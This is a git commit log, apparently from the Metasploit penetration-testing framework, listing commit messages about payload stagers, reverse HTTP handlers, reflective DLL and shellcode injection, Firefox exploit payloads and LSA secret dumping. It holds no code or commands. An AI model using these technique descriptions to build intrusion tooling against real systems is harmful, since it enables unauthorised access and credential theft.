1bc94b8a9d
Merge for retab
2014-02-17 19:19:47 -06:00
f07efc91a8
Land #2915 , @Meatballs1 improvements for LDAP post mixin
2014-02-17 19:14:59 -06:00
318ebdb4c8
Clean up // comments.
2014-02-17 15:34:42 -06:00
57449ac719
Adds working shellcode exec local exploit.
2014-02-17 15:31:45 -06:00
022c52d087
Added bundling to handle many sessions at once.
2014-02-15 15:37:22 -06:00
b0d2949f9a
Ensure no race conditions on handlers
...
Configurable WfsDelay
2014-02-15 15:21:16 -06:00
a83ca2b8d6
Ghost sessions fix, fewer selfies, cleaner code
2014-02-15 15:21:16 -06:00
9c8c16d238
Allow multiple handlers to use same hop.
2014-02-15 15:21:16 -06:00
16e1280b8d
Style guide fixes.
2014-02-15 15:21:16 -06:00
a6a731c8ee
Keep stage until replaced, nil check, prettify.
2014-02-15 15:21:16 -06:00
85ae32775a
Fix to make migrate work; use the full URL.
2014-02-15 15:21:16 -06:00
5f7a0e162c
Add reverse_hop_http stager and handler
2014-02-15 15:21:16 -06:00
f58b66adf8
Docs and more robust code
2014-02-14 23:15:05 +00:00
b8b36ef528
Merge remote-tracking branch 'upstream/master' into pr2075
2014-02-14 22:52:55 +00:00
4dd60631cb
Land #2950 - New Payload Generator for MsfVenom
2014-02-13 15:13:10 -06:00
61563fb2af
Do minor cleanup
2014-02-13 09:10:04 -06:00
0056c26047
import msf exploit
2014-02-12 22:06:18 -05:00
b453362a52
Merge remote-tracking branch 'upstream/pr/2966' into integrate_with_meatballs
2014-02-12 16:43:30 -05:00
4565be18e3
require active_support numeric
...
ensure we have the activesupport numeric bytes extension
loaded for calling .gigabyte
2014-02-12 13:20:13 -06:00
18816f3d5e
Land #2952 , -1 for last session ID
2014-02-11 16:22:36 -06:00
1f0020a61c
Land #2946 , @jlee-r7's optimization of the x86 block_api code
2014-02-11 15:00:00 -06:00
a67a14ff60
Land #2975 @wchen-r7's extra vprint_debug statements for ms13-090
2014-02-10 20:57:55 -05:00
d8ea11b851
Redirect HTTP too
2014-02-10 23:41:15 +00:00
442d212a94
Add vprint_debug to show what requirements are being compared
2014-02-10 17:33:36 -06:00
4a0f37dc21
Save lost changes
2014-02-10 23:24:26 +00:00
a87f604c98
Merge remote-tracking branch 'upstream/master' into mediawiki
2014-02-10 21:43:56 +00:00
fab8e16a87
Unbreak server exploits
2014-02-10 10:54:14 -06:00
57320a59f1
Do small clean up for mediawiki_thumb pr
2014-02-10 08:57:09 -06:00
4eb9a16b2c
Remove unnecessary return statement.
2014-02-09 13:06:21 -05:00
c76341c82d
Dont dsub Invoke-Command etc...
2014-02-09 17:45:30 +00:00
151e45d8d1
Better exception descriptions
2014-02-09 12:52:56 +00:00
77dda5dc67
Give option to remove badchars
2014-02-09 12:34:25 +00:00
0379dc128c
Raise exception on known issues
2014-02-09 12:15:02 +00:00
02f1ff27ee
Add option to encode inner payload
2014-02-09 00:55:26 +00:00
f398c982e3
Include option to ensure payload is fully encoded
2014-02-08 23:51:13 +00:00
ad308efc05
Really minimize commandline size
2014-02-08 22:53:47 +00:00
2cfc662e43
Use en-us instead
2014-02-08 16:16:09 -06:00
c37cb5075c
Merge remote-tracking branch 'upstream/master' into pr2075
2014-02-08 22:11:31 +00:00
c76862b391
Reduce payload size
2014-02-08 22:11:17 +00:00
b10df54dbb
Dont need to encode the compress payload
2014-02-08 21:34:51 +00:00
d1f3afeacc
Correct MSB refs
2014-02-08 13:32:56 +00:00
76f0783eef
Raise error if no domain found or specified
2014-02-08 12:16:48 +00:00
a5cb03e409
Copy Meterpreter return hash
...
Dont add a key if no value is found
2014-02-08 12:12:45 +00:00
6e197ce535
Post get_envs library methods
2014-02-08 11:37:25 +00:00
bd23fcf4b7
Land #2936 - Windows Command Shell Upgrade (Powershell)
2014-02-07 17:39:06 -06:00
f189b753e5
use more clear syntax for space
...
use 1.gigabyte as kronicdeth suggested, for great awesomeness
2014-02-07 15:52:19 -06:00
56359aa99f
Merge changes from other dev machine
2014-02-07 21:22:44 +00:00
103780c3da
Merge remote-tracking branch 'upstream/master' into mediawiki
2014-02-07 20:07:04 +00:00
f0fd2f0598
Land #2944 , add platforms to encoders
...
This allows encoders to advertise compatibility with a particular
platform (or more accurately, non-compatibility with everything that
isn't that platform).
See also #2939
2014-02-07 13:38:05 -06:00
aa3985c5e3
relign attribute tags
2014-02-07 11:04:17 -06:00
5d8dc76f48
put verbose messages to stderr
...
egypt pointed out we'll stomp on the payload output
otherwise. Good catch
2014-02-07 10:22:39 -06:00
27d7df554c
Use a single return statement defaulting to nil.
2014-02-06 14:50:59 -05:00
b9fb8decad
Support a (latest) session id of -1.
2014-02-06 14:11:38 -05:00
9d9305d2c0
more yardtag cleanup
2014-02-06 11:16:00 -06:00
34c4718e95
more style fixups
...
further kronicdeth appeasement
2014-02-05 18:12:44 -06:00
1bf11e5b92
some alpha-sorting
...
begining to appease KronicDeth
2014-02-05 17:47:32 -06:00
b226ecf591
Add block_api changes to prepend_migrate
2014-02-05 15:32:59 -06:00
ca48fb6590
fix encoding cycle if all encoders fail
...
we need to raise an exception if all encoders fail
2014-02-05 15:25:14 -06:00
1227a47342
fix exe template
...
don't pass an emtpy string for templates
this causes read errors. pass no value instead
2014-02-05 12:10:14 -06:00
508f251db2
add cli compat
...
add cli capability to putut verbose info to the console
2014-02-05 11:00:57 -06:00
293c231dfe
alpha-sort methods for ease
...
lexically sorted methods to make it easier to
look through code
2014-02-04 18:05:03 -06:00
fc9105d862
final generation and specs
...
generation wrapped method complete with specs
2014-02-04 17:52:20 -06:00
4dcae920f8
add specs for generate_java_payload
...
pretty self-explanatory
2014-02-04 17:40:59 -06:00
70d8246791
finish wiring up the final generation
...
formating and main generate methods wired up
still need to add some final tests
2014-02-04 15:52:18 -06:00
bda93c2bbc
Land #2811 - Add generate_war to jsp_shell payloads
2014-02-04 15:06:45 -06:00
80e7ae144b
Use the platform when selecting the payload
2014-02-04 14:34:11 -06:00
a58698c177
Land #2922 , multithreaded check command
2014-02-04 11:21:05 -06:00
0a3cb3377f
AppendEncoder
2014-02-04 15:41:10 +00:00
26c506da42
Naming of follow method
2014-02-04 15:25:51 +00:00
c8b7dc30b4
added encoding routines
...
now has a method for encoding the shellcode
and tests to go with
2014-02-03 17:51:22 -06:00
a8ff6eb429
Refactor send_request_cgi_follow_redirect
2014-02-03 21:49:49 +00:00
08493f2670
Merge remote-tracking branch 'upstream/master' into upgrade_psh
...
Conflicts:
lib/msf/core/post/file.rb
2014-02-03 18:02:09 +00:00
2ee1764ceb
Add method rhost, rport, and peer for post modules
...
[SeeRM #8761 ]
2014-02-03 01:05:43 -06:00
3b648346da
starting in on encoders
...
added get_encoders method to find propper encoders
started on encode_payload, incomplete
added specs
2014-02-03 00:59:08 -06:00
0d02f6d589
Add support for win shells for file?
2014-02-02 23:37:26 -06:00
4a82bc74cf
added nop sled generator
...
added code to prepend a nop sled
with tests to match
2014-02-02 22:51:12 -06:00
b9e234f62d
Log the size if it doesn't fit
2014-02-02 22:28:23 -06:00
bb5f5542f0
generating raw payload bits now
...
added raw payload generation, arch selection,
and specs for everything thus far
2014-02-02 21:09:17 -06:00
f9c31f988e
test platform selection
...
added tests around platform selection
2014-02-02 16:52:41 -06:00
f5d730e874
write specs around initialiser
...
added specs around object initialisation
2014-02-02 16:05:11 -06:00
e265d6f54c
begining of payload generator
...
started basics of generator
started adding specs
added option to simple framework to disable logging
2014-02-02 14:35:16 -06:00
95eb758642
Initial commit
2014-02-02 19:04:38 +00:00
9fa9402eb2
Better check and better follow redirect
2014-02-02 16:07:46 +00:00
0d3a40613e
Add auto 30x redirect to send_request_cgi
2014-02-02 15:03:44 +00:00
45bb336c51
Loop do it
2014-01-26 16:27:36 -06:00
eec01e79ff
No explicit "return"
2014-01-26 16:25:30 -06:00
6ffb750633
Change Unsupported message
...
Auxiliary modules can use check, too. Not just exploits.
2014-01-26 01:14:11 -06:00
2d12c0a368
NoMethod check and stuff
2014-01-25 20:25:01 -06:00
33da3a414b
Remove unnecessary options
2014-01-25 13:52:52 +00:00
27a434205c
More flexible domain and DN
2014-01-25 13:17:00 +00:00
93fa58ed45
aux scanner support
2014-01-24 17:54:40 -06:00
08885bde19
Always forget debugging stuff
2014-01-24 23:45:12 +00:00
be1da0e8a8
Move print statement
2014-01-24 23:37:20 +00:00
cb53ca261f
Tidyup logic
...
ADSI doesn't care about distinguished names or domain and can take
either, but legacy API needs a domain for binding and a dn for
searching.
Send nil if we dont know the domain rather than a ptr to an empty
string.
2014-01-24 23:28:08 +00:00
ae13d1f3e6
Grab the default domain to improve ldap
2014-01-24 16:36:37 +00:00
23ba52641b
Revert ldap
2014-01-24 16:25:48 +00:00
9fce617462
Fixup railgun utils
...
Implement DsGetDcNamea to return current domain using example
railgun utils techniques.
2014-01-24 16:22:05 +00:00
4bac297f66
Land #1473 , add LDAP hotness
2014-01-23 18:11:39 -06:00
4b21672b60
Remove hardcoded string
2014-01-23 23:55:09 +00:00
790e4d7559
Move options to mixin
2014-01-23 23:47:46 +00:00
398e8463b1
Add more informative errors
2014-01-23 23:19:00 +00:00
b5f61024c5
Land #2907 , fixes qual asset importer
...
Addresses MSP-9311
2014-01-23 13:32:22 -06:00
256f2b12eb
Land #2894 , @wchen-r7's CheckCode documentation update
2014-01-23 07:31:24 -06:00
58cf7193f9
fixing NameError undefined local variable in an import
2014-01-22 16:54:31 -06:00
9acd0f4b56
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2014-01-22 21:46:50 +00:00
90207628cc
Land #2666 , SSLCompression option
...
[SeeRM #823 ], where Stephen was asking for SSL compression for
Meterpreter -- this isn't that, but it's at least now possible for other
Metasploit functionality.
2014-01-22 10:42:13 -06:00
80452767c8
Comments
2014-01-22 10:24:24 +00:00
156e3c046e
Dont lookup twice
2014-01-22 10:14:56 +00:00
6d6d1e1033
No need to fiddle with naming context
2014-01-22 10:06:36 +00:00
0b6e03df75
More comment docs on SSLCompression
2014-01-21 16:48:26 -06:00
b8219e3e91
Warn the user about SSLCompression
2014-01-21 16:41:45 -06:00
720f892e2f
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2014-01-21 21:00:51 +00:00
ea47da5682
Add wiki link "How to write a check() method" to documentation
2014-01-20 20:10:50 -06:00
e48b8ae14c
Use a better term
2014-01-19 16:01:38 -06:00
afd0e71457
Use the term "exploit" is a little more correctly
...
So Metasploit uses the term "exploit" to describe something, a module
or an action, that results popping a shell. A check normally doesn't
pop a shell, so avoid that language.
2014-01-17 13:50:23 -06:00
363c53e14e
Clearify when to use a specific CheckCode
...
An example of the biggest confusion module developers face is not
actually knowing the difference between Detected vs Appears vs
Vulnerable. For example: a module might flag something as a
vulnerable by simply doing a banner check, but this is often
unreliable because either 1) that banner can be fooled, or 2)
the patch does not actually update the banner. More reasons may
apply. Just because the banner LOOKS vulnearble doesn't mean it is.
2014-01-17 13:35:17 -06:00
68ccdc8386
Fix a stack trace when module_payloads.rb is run
...
This fixes a missing check for self.target being nil in the compatible_payloads method
2014-01-13 15:36:33 -08:00
4ccf1a4720
Land #2873 , Msf::Handler::ReverseHttp::UriChecksum
2014-01-13 15:38:56 -06:00
41807d7e4e
move rev_http uri checksum code
...
need access to the uri checksum
routines outside of the handler.
moved them to their own mixin
and then mixed into the handler.
added specs also
2014-01-13 15:18:16 -06:00
e6e6d7aae4
Land #2868 , fix Firefox mixin requires
2014-01-13 14:23:51 -06:00
3db143c452
Remove explicit requires for FF payload.
...
Adds ff payload require to msf/core/payload.rb
2014-01-13 13:07:55 -06:00
95a5d12345
Merge #2835 , #2836 , #2837 , #2838 , #2839 , #2840 , #2841 , #2842 into one branch
2014-01-13 10:57:09 -06:00
cacd7ff9d4
Land #2827 - Add firefox js xpcom payloads for universal ff shells
2014-01-10 14:29:32 -06:00
7af8fe9cd1
Catch exceptions in an XSS script and return the error.
2014-01-07 16:23:24 -06:00
fb1a038024
Update async API to actually be async in all cases.
...
This avoids zalgo. Also optionally checks the return value
of the compiled Function in XSS to allow you to use send()
or an explicit return, which is maybe more natural for
synchronous xss payloads.
2014-01-07 16:17:34 -06:00
73e359ede1
Update reverse_tcp.rb
...
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:06:11 +01:00
e3a3b560e2
Update bind_tcp.rb
...
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:02:52 +01:00
3bf728da61
Dont store in DB by default
2014-01-07 12:20:44 +00:00
9d3b86ecf4
Add explicit require for JSON, so msfpayload runs.
2014-01-05 14:58:18 -06:00
d00acccd4f
Remove Java target, since it no longer works.
2014-01-04 21:22:47 -06:00
8898486820
Change display message to show actual bind address
...
When running a http/https listener the address:port that was being
shown in the output was that which was passed to the victim as part
of the stager and not the actual listener address:port.
This commit fixes this so that the display is correct.
2014-01-05 11:28:51 +10:00
f2f68a61aa
Use shell primitives instead of resorting to
...
echo hacks.
2014-01-04 19:00:36 -06:00
6034c26fa7
Honor LPORT as callback port for HTTP/S handler
...
This commit completes our quest to (optionally) decouple the stage's
callback parameters from the interface/port our handler binds to.
LPORT is now patched into the stage over ReverseListenerBindPort.
2014-01-04 18:52:19 -05:00
3c9d684759
Cleanup - Remove bind_address from reverse_http.rb
...
This commit removes the now unused bind_address function from
reverse_http.rb. This function returns an array of hosts the handler
should attempt to bind to (e.g., [LHOST value, any])
Other handlers (e.g., reverse_tcp.rb) loop through these values until
they're able to start a server with that bind address.
The HTTP server doesn't work this way. It's setup to try one address
and that's it. It makes sense to have the HTTP server always bind to
0.0.0.0 by default as future modules run by the user may register
resources with the same HTTP server.
2014-01-04 16:02:32 -05:00
6f55579acd
HTTP Handler Bind to 0.0.0.0 or ReverseListenerBindAddress
...
This commit returns the HTTP/S handler to its former semantic glory.
By default the HTTP/S handler will bind to :: or 0.0.0.0. If the
user specifies a ReverseListenerBindAddress then, instead, the
server will bind to that address.
The previous commit to change the URL to always reference LHOST
should go with this too. LHOST is always my intent of where the
stage should call home too. ReverseListenerBindAddress would make
sense as my intent as to where I want to bind to. The two options
shouldn't take on each other's meanings.
2014-01-04 15:50:06 -05:00
f93210ca74
Always Use LHOST for Full URL in HTTP/S Stage
...
Redmine #8726 documents a change where the reverse HTTP/S
tries to bind LHOST and if it can not it does a hard stop
If it's expected that users will use ReverseListenerBind-
-Address then this commit addresses #8726 by patching the
HTTP/S stage with the host provided by the user in LHOST.
Currently ReverseListenerBindAddress (if used) is patched
into the stage. This makes for a broken HTTP/S session if
the user sets this option to 0.0.0.0.
With this commit--users can provide any LHOST they like
and set ReverseListenerBindAddress to 0.0.0.0 and things
will work.
This commit does not attempt to bring the HTTP/S handler
back to the old behavior of falling back to 0.0.0.0 when
it can't bind LHOST. I'd welcome the old behavior but I
leave it to you to decide what makes sense. :)
2014-01-04 15:16:22 -05:00
b9c46cde47
Refactor runCmd, allow js exec.
...
* Updates exec payload to not touch disk
* Adds XSS module that uses hiddenWindow (to avoid X-Frame-Options)
2014-01-04 08:46:57 -06:00
60991b08eb
Whitespace tweak.
2014-01-03 18:40:31 -06:00
a5ebdce262
Add exec payload. Cleans up a lot of code.
...
Adds some yardocs and whatnot.
2014-01-03 18:23:48 -06:00
8fd517f9ef
Fixes shell escaping errors with nested quotes in windows.
2014-01-03 16:14:28 -06:00
13464d0aae
Minor cleanup of firefox.rb.
2014-01-03 01:34:57 -06:00
7961b3eecd
Rework windows shell to use wscript.
2014-01-03 01:29:34 -06:00
5606958320
Resolve require order
2014-01-02 23:46:18 +00:00
f5f18965b9
Move the require to the payloads as ruby and nodejs payloads do
2014-01-02 16:05:03 -06:00
764d0822f6
Use the current msf's naming convention
2014-01-02 15:57:09 -06:00
06fb2139b0
Digging around to get shell_command_token to work.
2014-01-02 14:05:06 -06:00
8d3130b19e
Reorder targets.
2014-01-02 10:48:28 -06:00
9b39ea55ee
Fix comment.{
2014-01-02 10:48:28 -06:00
1f9ac12dda
DRYs up firefox payloads.
2014-01-02 10:48:28 -06:00
694cb11025
Add firefox platform, architecture, and payload.
...
* Enables chrome privilege exploits in firefox to run a javascript cmd
shell session without touching the disk.
* Adds a spec for the addon_generator.
2014-01-02 10:48:28 -06:00
0725b9c69c
Refactor JSP payloads
2013-12-31 08:27:37 -06:00
985af3adfe
Update to masked credential format
...
* To support change in Pro export format. Previous format looked
like an XML element, for no reason, failed validation.
2013-12-30 10:59:15 -06:00
39844e90c3
Don't user merge! because can modify self.compat
2013-12-27 16:37:34 -06:00
9c484dd0a3
Land #2786 - HP SiteScope issueSiebelCmd Remote Code Execution
2013-12-23 02:34:01 -06:00
ed838d73a6
Allow targets to specify Compat[ible] payloads
2013-12-19 17:48:15 -06:00
ca23b32161
Add support for Procs in browserexploit requirements.
2013-12-19 12:49:05 -06:00
62ef810e7c
Use Extapi if available
2013-12-19 18:18:47 +00:00
737154c2fe
Update to use extapi
2013-12-19 16:46:09 +00:00
3ef1c0ecd6
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2013-12-19 14:25:07 +00:00
6e43edff4c
Merge in extapi post mixin
2013-12-19 14:25:02 +00:00
244cf3b3f6
Merge remote-tracking branch 'upstream/pr/2736' into enum_ad_perf
2013-12-19 13:59:57 +00:00
cb390bee7d
Move comment.
2013-12-18 20:37:33 -06:00
f411313505
Tidy whitespace.
2013-12-18 20:31:31 -06:00
9ff82b5422
Move datastore options to mixin.
2013-12-18 14:52:41 -06:00
64273fe41d
Move addon datastore options into mixin.
2013-12-18 14:42:01 -06:00
1235615f5f
Add firefox 15 chrome privilege exploit.
...
* Moves the logic for generating a firefox addon into its own mixin
* Updates the firefox_xpi_bootstrapped_addon module to use the mixin
* Module only works if you move your mouse 1px in any direction.
2013-12-18 14:30:35 -06:00
3e54379b0e
Merge remote-tracking branch 'upstream/master' into wmic_post
...
Conflicts:
lib/msf/core/post/windows.rb
2013-12-18 13:40:54 +00:00
687cbe5f60
Shadowcopy should use common wmic command
...
Small fix to ensure output is retrieved (args -> nil)
Modify shadowcopy to use wmic_query
2013-12-18 13:34:50 +00:00
252909a609
Land #2448 , @OJ's ReverseListenerBindPort :)
2013-12-17 11:24:09 -06:00
6ee1a9c6e1
Fix duplicate error
2013-12-17 00:11:37 +00:00
06b399ee30
Remove ERROR_
...
To access as Error::NO_ACCESS
2013-12-16 19:52:11 +00:00
08a44fdfb7
Filename match module
2013-12-16 19:48:17 +00:00
57f2027e51
Move to module
2013-12-16 19:45:52 +00:00
c9084bd2d5
Remove errant fullstops
2013-12-16 18:53:37 +00:00
75c87faaf8
Add Windows Error Codes to Windows Post Mixin
2013-12-16 18:50:18 +00:00
435cc9b93f
Add single quote encapsulation
...
For WMI and psh_web_delivery
2013-12-16 15:13:13 +00:00
b252e7873b
Merge remote-tracking branch 'upstream/master' into pr2075
2013-12-16 14:29:05 +00:00
819ba30a33
msftidy
...
Conflicts:
lib/msf/core/post/windows/services.rb
2013-12-15 01:12:46 +00:00
a930056d7f
Added service status checks to Post::Windows::Services
...
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module
Conflicts:
lib/msf/core/post/windows/services.rb
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
2013-12-15 01:12:45 +00:00
284a45a6c5
Convert UTF16 to ASCII
2013-12-14 22:58:16 +00:00
e46b5c9d55
Revert to file io if no EXTAPI
2013-12-14 22:46:22 +00:00
ca5ee7e156
Load extapi before wmic
2013-12-14 22:45:56 +00:00
b532987b8f
Re-add file out to wmic_command
2013-12-14 20:58:33 +00:00
8d5f298d3d
Clear clipboard first
2013-12-14 20:26:46 +00:00
7902f061ca
Final tidyup
2013-12-14 20:18:14 +00:00
04496a539c
Fix up local wmi exploit.
2013-12-14 20:05:51 +00:00
4224c016f4
Use WaitForSingleObject instead of loop
2013-12-14 18:42:31 +00:00
12afdd2cbb
Get and parse result from clipboard
2013-12-14 18:30:43 +00:00
3ad1e57f8d
Merge remote-tracking branch 'upstream/master' into wmic_post
2013-12-14 16:25:31 +00:00
83e448f4ae
Restore vprint_error message
2013-12-12 09:06:29 -06:00
5c1ca97e21
Create a new process to host the final payload
2013-12-12 08:26:44 -06:00
ff9cb481fb
Land #2464 , fixes for llmnr_response and friends
...
Fixed conflict in lib/msf/core/exploit/http/server.rb.
2013-12-10 13:41:45 -06:00
77e9996501
Mitigate metasm relocation error by disabling ASLR
...
Deal with import error by actually using the GetProcAddress code.
2013-12-07 20:54:13 -06:00
8d33138489
Support silent shellcode injection into DLLs
...
Only run code on DLL_PROCESS_ATTACH, preventing infinite loop otherwise:
Added code would create thread -> calls DLL entry point -> calling added code...
2013-12-07 19:44:17 -06:00
3aebe968bb
Land #2721 Reflective DLL Mixin
...
Adds support to load a dll and identify the ReflectiveLoader offset.
Adds support to inject dll into process and execute it.
Updates kitrap0d, ppr_flatten_rec, reflective_dll_inject modules and
payload modules to use above features.
2013-12-06 12:26:51 +00:00
155836ddf9
Adjusted style as per egypt's points
2013-12-06 10:08:38 +10:00
ccbf305de1
Remove exception stuff from the payloads
2013-12-06 09:26:46 +10:00
5a0a2217dc
Add exception if DLL isn't RDI enabled
2013-12-06 09:18:08 +10:00
2cb991cace
Shuffle RDI stuff into more appropriate structure
...
Now broken into two modules, one for loading RDI DLLs off disk and
finding the loader function offset, and another for doing the process
specific stuff of loading into the target.
2013-12-06 08:25:24 +10:00
fb84d7e7fe
Update to yardoc conventions
2013-12-06 07:54:25 +10:00
c7bb80c1d7
Add wvu as an author to author.rb
2013-12-05 00:33:07 -06:00
b936831125
Renamed the mixin module
2013-12-05 08:13:54 +10:00
7b24f815ee
Missed a single module in rename
2013-12-04 22:54:07 +10:00
7e8db8662e
Update name of the mixin
...
Changed `RdiMixin` to `ReflectiveDLLInjection`.
2013-12-04 22:18:29 +10:00
f79af4c30e
Add RDI mixin module
...
MSF was starting to see more modules using RDI to load binaries into
remote processes, so it made sense to create a mixin which contained
the functionality that was being used in various locations.
This commit contains the new mixin, and adjustments to all the existing
exploits and modules which use RDI.
2013-12-04 16:09:41 +10:00
8254c0bae2
this site is down
2013-12-01 14:26:03 +08:00
77b036ce5d
Land #2703 , uninit const fix for MSSQL_SQLI
2013-11-27 13:50:48 -06:00
a5aca618e2
fix fail_with usage on Exploit::Remote::MSSQL_SQLI
2013-11-27 11:33:19 -06:00
a32c9e5efc
Fix fail_with on Exploit::Remote::HttpClient
2013-11-27 11:19:46 -06:00
5d10b44430
Add support for Silverlight
...
Add support for Silverlight exploitation. [SeeRM #8705 ]
2013-11-26 14:47:27 -06:00
b015dd4f1c
Land #2532 Enum LSA Secrets
...
With refactoring of common methods from smart_hashdump, hashdump,
cachedump to Windows::Post::Privs
2013-11-24 18:09:33 +00:00
a3c7dccfc0
Add disconnect option to psexec
...
Allow the module to prevent the mixin from ending the SMB session.
2013-11-24 16:37:25 +00:00
dd9bb459bf
PSEXEC Refactor
...
Move peer into mixin
PSEXEC should use the psexec mixin
2013-11-24 16:24:05 +00:00
c03c33f6f6
Initial commit
2013-11-24 14:58:18 +00:00
e7dfda00db
Documentation
2013-11-23 22:03:43 +00:00
becc521406
Constants, yey
2013-11-23 21:46:11 +00:00
699d13eef1
Share the wealth
...
Move LDAP methods to a Post mixin.
2013-11-23 21:42:09 +00:00
6c83109422
Really fix wmi
2013-11-23 16:44:44 +00:00
8e23119e17
Land #2678 , DB_ALL_CREDS should default to false
2013-11-22 23:42:00 -06:00
8fc0a8199e
DB_ALL_CREDS should be disabled by default
...
[SeeRM #8699 ]
2013-11-22 22:16:40 -06:00
259d5a2dba
Backout Set-Variable as it is 3.0 only
2013-11-23 01:15:13 +00:00
1c60373f68
Reinstate %COMSPEC%
2013-11-23 00:45:04 +00:00
c194fdc67e
Fixup WMI
...
-c doesn't like $var assignments
2013-11-23 00:31:11 +00:00
3cbf768d16
Small size reductions
2013-11-22 22:58:42 +00:00
20b76602a1
Merge remote-tracking branch 'upstream/master' into pr2075
...
Conflicts:
lib/msf/core/exploit/powershell.rb
2013-11-22 22:41:08 +00:00
e88da09894
Land #2660 , DLL/service creation for x64
2013-11-20 17:25:16 -06:00
739c7b4ca2
More dead code and tweaks.
2013-11-20 14:44:53 -06:00
3ff9da5643
Remove compression options from client sockets.
...
I couldn't verify that it was working, as it always sends 1 compression type of NULL.
2013-11-20 14:41:45 -06:00
3ed84d1e0b
Remove puts
2013-11-20 20:29:54 +00:00
7253cc73d5
:payload_instance
2013-11-20 20:28:00 +00:00
f27194a8ce
Always default to payload options
2013-11-20 20:14:59 +00:00
135dad1f4e
Fix dll/service creation
2013-11-20 20:10:47 +00:00
110e78a1ad
Land #2507 , @todb-r7's fix to allow DCERPC misin to use RPORT
2013-11-20 10:21:32 -06:00
f8b57d45cd
Reenable the client SSLCompression advanced option.
...
Add spec for some of the additions to Rex::Proto::Http::Client
2013-11-20 01:03:13 -06:00
109fc5a834
Add SSLCompression datastore option.
...
Also disables the compression by default. TLS-level compression is almost
never used by browsers, and openssl seems to be the only one that enables
it by default.
This also kills some ruby < 1.9.3 code.
2013-11-19 22:34:39 -06:00
ac1fb2d1da
Just use a straight RPORT, don't sneak 593.
...
Incidentally, the endmap scanner doesn't appear to work at all for
http-rpc-epmap, so no harm done anyway (tested against Windows 2008
server).
It looks like a bigger change than it realy is, thanks to the indentaton
changes by removing the itertor. Diff this without whitespace changes to
get a better idea of what's actually different.
2013-11-19 13:29:02 -06:00
f690667294
Land #2617 , @FireFart's mixin and login bruteforcer for TYPO3
2013-11-18 13:37:16 -06:00
0aef145f64
Merge remote-tracking branch 'upstream/master' into land-2532-enum-lsa
2013-11-13 18:11:21 -06:00
8471f74b75
Refactor ivar to a more reasonable method
...
Also changes jtr output for cachedump to produce hashes that can be
auto-detected as mscash2 format for a better user experience.
2013-11-13 18:09:41 -06:00
16627c1bd3
Add spec for capture_lsa_key
2013-11-13 15:16:34 -06:00
6bd82d8589
Land #2636 , Win8 for {constants,platform}.rb
2013-11-13 14:20:52 -06:00
3a923422a3
Update class for Win 8
2013-11-13 13:27:44 -06:00
3168359a82
Refactor lsa and add a spec for its crypto methods
2013-11-13 11:55:39 -06:00
74df9bd037
Bump version number since 4.8.0 is out
2013-11-13 11:42:31 -06:00
8e90116c89
Add Win 8 to constants
2013-11-13 11:38:27 -06:00
ef6d9db48f
Land #2613 , @wchen-r7's BrowserExploitServer mixin
2013-11-12 17:33:12 -06:00
fbe1b92c8f
Good bye get_resource
2013-11-12 17:25:55 -06:00
2035983d3c
Fix a handful of msftidy warnings, and XXX SSL
...
Marked the SSL stuff as something that needs to be resolved in order to
fix a future bug in datastore manipulation. Also, fixed some whitespace
and exec complaints
[SeeRM #8498 ]
2013-11-11 21:23:35 -06:00
cf8f2940b0
Oops, this is the right filename
2013-11-11 15:45:11 -06:00
85150823cd
rename again
2013-11-11 15:44:27 -06:00
6a840fc169
Move file to get a matching name
2013-11-11 12:41:03 -06:00
063da8a22e
Update reverse_https_proxy stager/handler
...
This change updates the proxy handler code, which for some reason was
ommitted in the orginal commits. This now uses the same mechanism as
the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead
uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
2013-11-11 22:21:05 +10:00
866f240337
A little update on documentation
2013-11-07 17:06:43 -06:00
32b12609bd
Forgot to pass optional headers
2013-11-07 16:50:58 -06:00
bdd33d4daf
implement feedback from @jlee-r7
2013-11-07 23:07:58 +01:00
aab4d4ae76
first commit for typo3
2013-11-07 22:38:27 +01:00
991240a87e
Support java version detection
2013-11-07 00:54:52 -06:00
3e1771aa77
Being able to pass binding when we need to
2013-11-07 00:12:29 -06:00
23996ec32c
Fix up some things
2013-11-06 22:47:02 -06:00
c338f7a8c0
Change how requirements are defined, rspec, etc
2013-11-06 14:01:29 -06:00
c92116060e
Forgot to rm this line
2013-11-06 01:53:46 -06:00
f2e4d5507c
More rspec
2013-11-06 01:45:40 -06:00
636adc81de
Add rop_junk and rop_nop
2013-11-06 01:04:33 -06:00
65c96a1f45
Allow the module to be target specific
2013-11-06 00:57:53 -06:00
63d3c7e8bb
Put proxy headers in a constant
2013-11-05 16:33:36 -06:00
73701462ed
Fix ActiveX. Use ERB for Javascript detection code.
2013-11-05 16:26:41 -06:00
36f96d343e
Revert "Revert "Land #2505" to resolve new rspec fails"
...
This reverts commit e7d3206dc9
2013-11-05 13:45:00 -06:00
9c6b187cc6
stuff
2013-11-05 11:05:33 -06:00
0513dad789
-_-
2013-11-05 10:30:37 -06:00
9d1742ac47
Fix typos
2013-11-05 10:15:53 -06:00
8fb2b943be
Add ActiveX detection
2013-11-05 01:34:56 -06:00
5f2d8358c0
Be more browser specific with Javascript generation
2013-11-05 01:04:52 -06:00
844daf0e00
No regex for get_resource checking
2013-11-04 17:49:43 -06:00
054a525f35
Change profile data structure
2013-11-04 17:46:36 -06:00
ef57a38274
Move documentation about profile structure
2013-11-04 16:47:15 -06:00
12810580d6
Remove arg for bind port/addr functions
...
Done to avoid masking of datastore instance variable.
2013-11-05 06:56:21 +10:00
9c8ecd2ede
Fix encoding order
2013-11-04 14:06:42 -06:00
d970925cbf
Fix encoding bug
2013-11-04 13:45:29 -06:00
23e5a9f048
Force on_request_exploit override
2013-11-04 12:54:52 -06:00
e83f4e5120
Use a warning
2013-11-04 12:54:41 -06:00
25787fbaa7
Change has_proxy?
2013-11-04 12:52:15 -06:00
c6fb570480
Correct bad method naming
2013-11-04 12:35:04 -06:00
016e686bcf
super chomp
2013-11-04 12:28:22 -06:00
c3d9f4064c
They are symbols not strings
2013-11-04 12:10:39 -06:00
0337e6ff54
Do yard documentation
2013-11-04 12:09:59 -06:00
abc06aa8aa
Use mutex
2013-11-01 11:35:23 -05:00
5fb261a974
Change var name
